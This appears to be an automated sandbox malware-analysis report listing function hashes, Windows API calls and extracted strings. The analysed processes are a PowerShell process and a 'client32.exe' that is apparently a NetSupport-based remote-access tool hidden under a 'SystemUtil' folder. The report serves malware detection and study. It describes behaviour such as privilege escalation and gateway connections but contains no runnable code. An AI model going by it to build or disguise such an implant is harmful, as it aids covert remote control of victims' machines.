Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a045880ef595e4dc3c58201c641772b14ad5f4e8856d533cfd04aeded7ee7290
Instruction ID: ff8ad9ccd32546353747542e432196bdb83667407bb5be6c5123c95ae959672f
Opcode Fuzzy Hash: a045880ef595e4dc3c58201c641772b14ad5f4e8856d533cfd04aeded7ee7290
Instruction Fuzzy Hash: A0F06736D10648DFCB04DFA8D840CEDBB72FF95310F119129E94437220EB30AA8ACBA1

Function 079ABD39 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1706701129.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0001fbbb4ea7504877653d09a1104f0f78ed11827a5d120c83e624a28748c2
Instruction ID: f867e2d921a8f97e0370b3721acd57379f0123cbba782e2a97352728d6b80737
Opcode Fuzzy Hash: 0f0001fbbb4ea7504877653d09a1104f0f78ed11827a5d120c83e624a28748c2
Instruction Fuzzy Hash: 02F015B4D0A24AAECF58CFB8A4011EEFFF4AE09615B1085AFC919E2600D63042508F95

Function 04C86CD2 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1656669558.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d45739775c70794a28914d89e74c5b547d729fda6b9fc0fd2f1f65d579b2d9c
Instruction ID: e6a8a2f6f3eb52f3057e90ed20d625cc42f9570b91750c615af1a6f115f3ebb4
Opcode Fuzzy Hash: 8d45739775c70794a28914d89e74c5b547d729fda6b9fc0fd2f1f65d579b2d9c
Instruction Fuzzy Hash: 3901F674A0420A8FC744DFA8D195A6A7BF0BF09214F6041E9D505DB322E6309941CBD1

Function 079AAA48 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1706701129.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48c252361a4379c84586c3092eef406d9855f7d0641494da8d51966dbef823f8
Instruction ID: 221ba7ba64bad3f6eea1a9defc417606986c97e1cd6d54d47ba02499c1040124
Opcode Fuzzy Hash: 48c252361a4379c84586c3092eef406d9855f7d0641494da8d51966dbef823f8
Instruction Fuzzy Hash: 1DE0DF3221B2942FC7214229AC488D7BFACDE8292530501EBE108CB162C621C908C6A0

Function 04C86CE0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1656669558.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec29703bdfe35c9dcfe6e30e361dd352d8a0a3a49a4636aafcdb0490f1b58123
Instruction ID: 4673edf4e06ec262eb4d59f121635a458e58deb32d1b024cf780af947e4920fd
Opcode Fuzzy Hash: ec29703bdfe35c9dcfe6e30e361dd352d8a0a3a49a4636aafcdb0490f1b58123
Instruction Fuzzy Hash: 9EF0A974E0020A8FC780DF68C485AAEBBF5FF49214F504199D509DB321E730A941CF91

Function 07B03A80 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1707337573.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7b00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a15811466979bd6496734a1e2bfb7a403b76e486cf2fd675ed401acc64eac63a
Instruction ID: 62dc8bc2e8f142530d74120555925a3fbf1f6acdf7ab3b87a78ed5c6a1f40221
Opcode Fuzzy Hash: a15811466979bd6496734a1e2bfb7a403b76e486cf2fd675ed401acc64eac63a
Instruction Fuzzy Hash: 26E09270200B149BCA307FA99C0458A7A6ABB826707104B2CE1A24FAC0DB66E80147D2

Function 079ABD08 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1706701129.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44693eb0fbe801833acd61970c54f23702d6935b2356a0987be390c5de16c0a5
Instruction ID: ed7bfd0e7d6816c7329acec70b6ae1e576b847516f0c664c1752eb7647efa8e7
Opcode Fuzzy Hash: 44693eb0fbe801833acd61970c54f23702d6935b2356a0987be390c5de16c0a5
Instruction Fuzzy Hash: 82D05EB941F3C96FC313436068682F8BF659F02519F1916CBD549A6053CA5544488BA2

Function 079ABD48 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1706701129.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8342155b31d0ee9a46d24a34ab265ce41f5e4607bc663dfee32d6db8530bafa
Instruction ID: 2804342cf5cd0bd1bc43e3576348cc83dd98462acd4c017d3ae39a3ce2ef1a1d
Opcode Fuzzy Hash: f8342155b31d0ee9a46d24a34ab265ce41f5e4607bc663dfee32d6db8530bafa
Instruction Fuzzy Hash: E2E0B6B4D0820E9FCF48DFB994411BEFBF4AB48200F00896E9829E3300E63446118FD5

Function 079AA663 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1706701129.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bde26752009435887eebce9dc2e39c2ca2e7f9ca6fe3ff25e301b96dadb3bb3a
Instruction ID: 052a5c173db9a29c4cadab5d80a8a50991cf373d5794c4791eabc57cc6b88e20
Opcode Fuzzy Hash: bde26752009435887eebce9dc2e39c2ca2e7f9ca6fe3ff25e301b96dadb3bb3a
Instruction Fuzzy Hash: D0D092B089660AEFEB24DF80C26A7AEBB74EB0831DF208819C001A5184CBB51A44CFD1

Analysis Process: client32.exePID: 6588, Parent PID: 7320COMMON

Execution Graph

Execution Coverage:	4.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	97

Executed Functions

Function 1109D4A0 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501
filethreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 1109C750: GetCurrentProcess.KERNEL32(000F01FF,?,1102FAC3,00000000,00000000,00080000,62C07B5E,00080000,00000000,00000000), ref: 1109C77D
Part of subcall function 1109C750: OpenProcessToken.ADVAPI32(00000000), ref: 1109C784
Part of subcall function 1109C750: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C795
Part of subcall function 1109C750: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C7B9

LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,62C07B5E,00080000,00000000,00000000), ref: 1109D535
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109D54E
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109D559
GetVersionExA.KERNEL32(?), ref: 1109D570
GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D5DE
SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109D5F3
FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D604
CreateFileMappingA.KERNEL32(000000FF,1102FAC3,00000004,00000000,?,?), ref: 1109D640
GetLastError.KERNEL32 ref: 1109D64D
LocalFree.KERNEL32(?), ref: 1109D676
LocalFree.KERNEL32(?), ref: 1109D683
GetLastError.KERNEL32 ref: 1109D6A0
MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109D6BE
LocalFree.KERNEL32(?), ref: 1109D6E9
LocalFree.KERNEL32(?), ref: 1109D6F6

Part of subcall function 1109C6C0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109D58E), ref: 1109C6C8

Part of subcall function 1109C700: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109C714

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D722
LocalFree.KERNEL32(?), ref: 1109D7EB
LocalFree.KERNEL32(?), ref: 1109D7F8
_memset.LIBCMT ref: 1109D810
GetTickCount.KERNEL32 ref: 1109D818
GetCurrentProcessId.KERNEL32 ref: 1109D8C4
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D8DF
CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109D92B
GetLastError.KERNEL32 ref: 1109D934
GetLastError.KERNEL32(00000000), ref: 1109D93B
CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D970
GetLastError.KERNEL32 ref: 1109D979
GetLastError.KERNEL32(00000000), ref: 1109D980
CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109D9B6
GetLastError.KERNEL32 ref: 1109D9BF
GetLastError.KERNEL32(00000000), ref: 1109D9C6
CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D9FB
GetLastError.KERNEL32 ref: 1109DA0A
GetLastError.KERNEL32(00000000), ref: 1109DA0D
LocalFree.KERNEL32(?), ref: 1109DA35
LocalFree.KERNEL32(?), ref: 1109DA42
GetCurrentThreadId.KERNEL32 ref: 1109DA73
CreateThread.KERNEL32(00000000,00002000,Function_0009D030,00000000,00000000,00000030), ref: 1109DA8D
ResetEvent.KERNEL32(?), ref: 1109DABC
ResetEvent.KERNEL32(?), ref: 1109DAC2
ResetEvent.KERNEL32(?), ref: 1109DAC8
SetEvent.KERNEL32(?), ref: 1109DACE

Strings

Error creating filemap (%d), xrefs: 1109D654
cant map, xrefs: 1109D6F8
S:(ML;;NW;;;LW), xrefs: 1109D598
cant create events, xrefs: 1109DB04
Error filemap exists, xrefs: 1109D7CD
Error cant map view, xrefs: 1109D6CB
cant create thread, xrefs: 1109DA9A
IPC(%s) created, xrefs: 1109DAD8
SeSecurityPrivilege, xrefs: 1109D50A
Info - reusing existing filemap, xrefs: 1109D789
Error cant create events, xrefs: 1109DAF7
cant create filemap, xrefs: 1109D685
Cant create event %s, e=%d (x%x), xrefs: 1109D949, 1109D98E, 1109D9D4, 1109DA17
map exists, xrefs: 1109D7FA
warning map exists, xrefs: 1109D7A0

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
API String ID: 3291243470-2792520954
Opcode ID: 7d2eca5f92aeb90d6110f97020967db0a84e126fbda8524f3f6ea0900cc0b1d0
Instruction ID: d0fdbac131d557a40c9b368ac235ec40647fb92da06757c3bb5e6f0a5f2f1ed9
Opcode Fuzzy Hash: 7d2eca5f92aeb90d6110f97020967db0a84e126fbda8524f3f6ea0900cc0b1d0
Instruction Fuzzy Hash: 2F1270B5E002599FDB20DF65CCD4AAEB7FAFB88304F0045A9E60D97240E771A984CF61

Function 68C77030 Relevance: 91.4, APIs: 21, Strings: 31, Instructions: 406
threadlibrarysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 68C62A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 68C62ACB
Part of subcall function 68C62A90: _strrchr.LIBCMT ref: 68C62ADA
Part of subcall function 68C62A90: _strrchr.LIBCMT ref: 68C62AEA
Part of subcall function 68C62A90: wsprintfA.USER32 ref: 68C62B05

Part of subcall function 68C7DBD0: _malloc.LIBCMT ref: 68C7DBE9
Part of subcall function 68C7DBD0: wsprintfA.USER32 ref: 68C7DC04
Part of subcall function 68C7DBD0: _memset.LIBCMT ref: 68C7DC27

LoadLibraryA.KERNEL32(WinInet.dll), ref: 68C77057
InitializeCriticalSection.KERNEL32(68CAB898), ref: 68C770DF
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 68C770EF
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 68C77115
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 68C7713B
WSAStartup.WSOCK32(00000101,68CAB91A), ref: 68C77167
_malloc.LIBCMT ref: 68C771A3

Part of subcall function 68C81B69: __FF_MSGBANNER.LIBCMT ref: 68C81B82
Part of subcall function 68C81B69: __NMSG_WRITE.LIBCMT ref: 68C81B89
Part of subcall function 68C81B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,68C8D3C1,68C86E81,00000001,68C86E81,?,68C8F447,00000018,68CA7738,0000000C,68C8F4D7), ref: 68C81BAE

_memset.LIBCMT ref: 68C771D3
_calloc.LIBCMT ref: 68C77214
_malloc.LIBCMT ref: 68C7728B
_memset.LIBCMT ref: 68C772C1
_malloc.LIBCMT ref: 68C772CD
_memset.LIBCMT ref: 68C77303
GetTickCount.KERNEL32 ref: 68C77361
CreateThread.KERNEL32(00000000,00004000,68C76BA0,00000000,00000000,68CABACC), ref: 68C7737E
SetThreadPriority.KERNEL32(00000000,00000001), ref: 68C773AC
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\SystemUtil\Support\,00000104), ref: 68C77430
GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\user\AppData\Roaming\SystemUtil\Support\pci.ini), ref: 68C774B0
GetModuleHandleA.KERNEL32(nsmtrace), ref: 68C774C0
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 68C77566
timeBeginPeriod.WINMM(00000001), ref: 68C77573

Strings

*CMPI, xrefs: 68C7731F
*DisconnectTimeout, xrefs: 68C7733A
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 68C770FF, 68C77125, 68C7714B, 68C771B9, 68C7722A, 68C772A1, 68C772E3, 68C77392, 68C773BD
0/Mw, xrefs: 68C770E5
_debug, xrefs: 68C77502, 68C77519, 68C7753C, 68C7754C
sv.ResumeEvent, xrefs: 68C77150
WinInet.dll, xrefs: 68C77052
Trace, xrefs: 68C77547
226546, xrefs: 68C77242
General, xrefs: 68C7733F
sv.hRecvThread, xrefs: 68C77397
NetworkSpeed, xrefs: 68C773D7
(iflags & CTL_REMOTE) == 0, xrefs: 68C773C2
sv.hResponseEvent, xrefs: 68C7712A
Support\, xrefs: 68C77451
sv.hRecvThreadReadyEvent, xrefs: 68C77104
htctl.packet_tracing, xrefs: 68C774A8
sv.subset.omit, xrefs: 68C772E8
pci.ini, xrefs: 68C7748F
NSM832428, xrefs: 68C77257
HTCTL32, xrefs: 68C77036
C:\Users\user\AppData\Roaming\SystemUtil\Support\pci.ini, xrefs: 68C77481, 68C7749B
C:\Users\user\AppData\Roaming\SystemUtil\Support\, xrefs: 68C7742A, 68C77438, 68C7744C
TraceFile, xrefs: 68C77537
sv.gateways, xrefs: 68C7722F
nsmtrace, xrefs: 68C774B6
sv.subset.subset, xrefs: 68C772A6
mode, xrefs: 68C774A1
sv.s, xrefs: 68C771BE
TraceSend, xrefs: 68C774DB, 68C77514
TraceRecv, xrefs: 68C774CF, 68C774FD

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$0/Mw$226546$C:\Users\user\AppData\Roaming\SystemUtil\Support\$C:\Users\user\AppData\Roaming\SystemUtil\Support\pci.ini$General$HTCTL32$NSM832428$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
API String ID: 3160247386-2073941376
Opcode ID: a95f779f49e5f1ecebd96c8a06ec9d3ea54c40a4fa0ded5b8e8812a9f80477e0
Instruction ID: 0442d028159149703478a4534520939b854b8a8a0c22d8673e09fdaa32dceaef
Opcode Fuzzy Hash: a95f779f49e5f1ecebd96c8a06ec9d3ea54c40a4fa0ded5b8e8812a9f80477e0
Instruction Fuzzy Hash: 78D1B2B594021DAFDB209F699CC5A2E7BF8EB0935CBC0842AF959E7641F730DC408B91

Function 11029230 Relevance: 86.3, APIs: 37, Strings: 12, Instructions: 534
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(WinInet.dll,62C07B5E,774D23A0,?,00000000), ref: 11029265
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110292FF
InternetCloseHandle.WININET(000000FF), ref: 1102930D
SetLastError.KERNEL32(00000078), ref: 11029313
GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029351
GetLastError.KERNEL32 ref: 11029372
_free.LIBCMT ref: 1102937E
GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110293A1
GetProcAddress.KERNEL32(?,InternetOpenA), ref: 110293DB
InternetOpenA.WININET(11190240,?,?,000000FF,00000000), ref: 110293FA
SetLastError.KERNEL32(00000078), ref: 11029404
SetLastError.KERNEL32(00000078), ref: 11029411
SetLastError.KERNEL32(00000078), ref: 1102941B
_free.LIBCMT ref: 11029425

Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD

GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110294A5
SetLastError.KERNEL32(00000078), ref: 110294BE
GetProcAddress.KERNEL32(?,InternetConnectA), ref: 110294D1
InternetConnectA.WININET(000000FF,111955E0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 110294EE
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102950A
SetLastError.KERNEL32(00000078), ref: 11029523
GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029549
GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 1102959D
GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029703
SetLastError.KERNEL32(00000078), ref: 110297D0
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029822
SetLastError.KERNEL32(00000078), ref: 11029839
FreeLibrary.KERNEL32(?), ref: 1102984A

Strings

HttpOpenRequestA, xrefs: 11029543
InternetQueryDataAvailable, xrefs: 110296FD
HttpSendRequestA, xrefs: 11029597
HttpQueryInfoA, xrefs: 110295E3
InternetErrorDlg, xrefs: 11029640
WinInet.dll, xrefs: 1102925D
://, xrefs: 11029445
InternetCloseHandle, xrefs: 110292F9, 1102949F, 11029504, 1102981C
InternetConnectA, xrefs: 110294CB
InternetQueryOptionA, xrefs: 1102934B, 1102939B
GET, xrefs: 11029569
InternetOpenA, xrefs: 110293D5

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$Internet$FreeLibrary_free$CloseConnectHandleHeapLoadOpen
String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
API String ID: 1118357157-913974648
Opcode ID: aa1c09a8f6874cf7a215acd20bd2a046f9d37fd6d8eeec8765b9f3cbce786001
Instruction ID: 8a892d803199c7046cb733a2a01a4e5fa1610c0a6219e27d09306c56163d799e
Opcode Fuzzy Hash: aa1c09a8f6874cf7a215acd20bd2a046f9d37fd6d8eeec8765b9f3cbce786001
Instruction Fuzzy Hash: AA127FB1E002299BDB11CFA9CC88A9EFBF4FF88344F60856AE555F7240EB745940CB61

Function 68C6A980 Relevance: 56.4, APIs: 28, Strings: 4, Instructions: 389
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 68C65840: inet_ntoa.WSOCK32(00000080,?,00000000,?,68C68F91,00000000,00000000,68CAB8DA,?,00000080), ref: 68C65852

EnterCriticalSection.KERNEL32(68CAB898,?,00000000,00000000), ref: 68C6AA11
LeaveCriticalSection.KERNEL32(68CAB898), ref: 68C6AA58
LeaveCriticalSection.KERNEL32(68CAB898), ref: 68C6AA68
LeaveCriticalSection.KERNEL32(68CAB898), ref: 68C6AA94
WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 68C6AB0B
socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 68C6AB4E
WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 68C6AB5A
#21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 68C6AB8E
#21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 68C6ABB1
#21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 68C6ABE3
bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 68C6AC18
WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 68C6AC21
closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 68C6AC29
htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 68C6AC65
WSASetBlockingHook.WSOCK32(68C663A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 68C6AC76
WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 68C6AC8F
WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 68C6AC96
closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 68C6AC9C
WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 68C6ACFD
WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 68C6AD04
closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 68C6AD0A
WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 68C6AD45
EnterCriticalSection.KERNEL32(68CAB898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 68C6AD4F
InitializeCriticalSection.KERNEL32(-68CACB4A), ref: 68C6ADE6

Part of subcall function 68C68FB0: _memset.LIBCMT ref: 68C68FE4
Part of subcall function 68C68FB0: getsockname.WSOCK32(?,?,00000010,?,02B92E80,?), ref: 68C69005

getsockname.WSOCK32(00000000,?,?), ref: 68C6AE4B
LeaveCriticalSection.KERNEL32(68CAB898), ref: 68C6AE60
GetTickCount.KERNEL32 ref: 68C6AE6C
InterlockedExchange.KERNEL32(?,00000000), ref: 68C6AE7A

Strings

*TcpNoDelay, xrefs: 68C6ABB8
Cannot connect to gateway %s, error %d, xrefs: 68C6ACA6
Connect error to %s using hijacked socket, error %d, xrefs: 68C6AB17
Cannot connect to gateway %s via web proxy, error %d, xrefs: 68C6AD14

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
